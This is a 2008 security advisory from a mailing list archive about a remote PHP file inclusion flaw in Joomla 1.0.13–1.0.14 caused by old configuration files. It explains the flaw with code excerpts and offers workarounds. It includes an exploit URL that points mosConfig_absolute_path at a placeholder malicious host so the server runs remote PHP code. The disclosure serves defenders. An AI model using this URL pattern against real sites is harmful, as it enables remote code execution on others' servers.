<<< Date Index >>>     <<< Thread Index >>>

Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php



Affects: Joomla 1.0.13 - 1.0.14
Vulnerability: (remote) PHP file inclusion possible if old
configuration.php
Date: 14-feb-2008
 
Introduction:
 
Remote PHP file inclusion is possible when RG_EMULATION is not defined
in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP,
register_globals
must be 'off', for this exploit to work.
 
In Joomla >=1.0.13, configuration.php-dist disables register_globals
emulation, by defining RG_EMULATION false. In older Joomla versions,
this
was defined in globals.php instead.
 
Users upgrading, without touching configuration.php (quite typical),
will have RG_EMULATION
unset, resulting in the following vulnerability.
 
In Revision 7424 of globals.php, the 'configuration.php' file is
included
before registerGlobals() is called, allowing a malicious peer to
override any value set in configuration.php.
 
Details:
 
Since revision 7424, globals.php includes 'configuration.php' if
RG_EMULATION is unset, and enables RG_EMULATION by default for 'old
configuration files':
 
if( defined( 'RG_EMULATION' ) === false ) {
 if( file_exists( dirname(__FILE__).'/configuration.php' ) ) {
  require( dirname(__FILE__).'/configuration.php' );
 }
 
 if( defined( 'RG_EMULATION' ) === false ) {
  // The configuration file is old so default to on
  define( 'RG_EMULATION', 1 );
 }
}
 
The registerGlobals function is called *after* having included
'configuration.php':
 
} else if (ini_get('register_globals') == 0) {
 // php.ini has register_globals = off and emulate = on
 registerGlobals();
 
Maliciously set GET variables cause variables set by configuration.php
to be overwritten.
 
Looking in index.php:
 
require( 'globals.php' );
require_once( 'configuration.php' );
 
Since 'configuration.php' was already included by globals.php, the
require_once() won't include the configuration.php again (leaving
"attacker's" values untouched!).
 
The exploit:
 
http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s
cript.txt
 
Workaround:
 
In index*.php and administrator/index*.php change:
 
 require_once( 'configuration.php' );
 
to
 
 require('configuration.php');
 
Or disable RG_EMULATION by using the line in configuration.php-dist in
configuration.php:
 
if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by
default for security

Regards,


Hendrik-Jan Verheij
BWSS B.V.